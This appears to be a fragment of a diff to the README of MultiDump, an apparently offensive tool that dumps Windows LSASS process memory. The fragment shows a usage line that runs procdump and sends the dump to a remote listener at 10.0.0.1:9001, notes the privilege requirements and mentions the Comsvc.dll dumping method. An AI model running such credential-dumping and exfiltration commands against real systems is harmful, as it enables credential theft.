Xre0uS/MultiDump/README.md

         MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 10.0.0.1:9001
 ```

+As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

 By default, MultiDump uses the `Comsvc.dll` method and saves the encrypted dump in the current directory.

 ```powershell